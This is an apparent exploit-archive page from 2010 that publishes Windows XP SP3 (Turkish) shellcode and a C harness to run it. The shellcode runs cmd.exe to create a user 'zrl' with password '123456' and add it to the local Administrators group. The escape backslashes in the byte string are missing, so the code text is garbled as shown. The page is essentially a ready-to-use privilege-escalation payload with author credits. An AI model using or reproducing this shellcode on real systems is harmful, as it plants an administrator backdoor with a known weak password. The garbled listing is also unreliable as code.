win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
# Published : 2010-09-20
# Author :
# Previous Title : Linux x86 ASLR deactivation - 83 bytes
# Next Title : ARM Loader Port 0x1337

# Title        : win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
# Proof        : http://img823.imageshack.us/img823/1017/addqx.jpg
# Desc.        : usr: zrl , pass: 123456 , localgroup: Administrator
# Author       : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn     : admin@yildirimordulari.com
# Home         : http://z0rlu.blogspot.com
# Date         : 17/09/2010
# Tesekkur     : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi      : off ulan off  /  http://www.youtube.com/watch?v=GbyF62skA-c


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
int main(){
    
    unsigned char shellcode[]=
    "xebx1bx5bx31xc0x50x31xc0x88x43x5dx53xbbxadx23x86x7c"
    "xffxd3x31xc0x50xbbxfaxcax81x7cxffxd3xe8xe0xffxffxff"
    "x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73"
    "x65x72x20x7ax72x6cx20x31x32x33x34x35x36x20x2fx61x64"
    "x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f"
    "x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
    "x20x2fx61x64x64x20x7ax72x6cx20x26x26x20x6ex65x74x20"
    "x75x73x65x72x20x7ax72x6c";
 
    printf("Size = %d bytesn", strlen(shellcode));
 
    ((void (*)())shellcode)();
    
    
 
    return 0;
}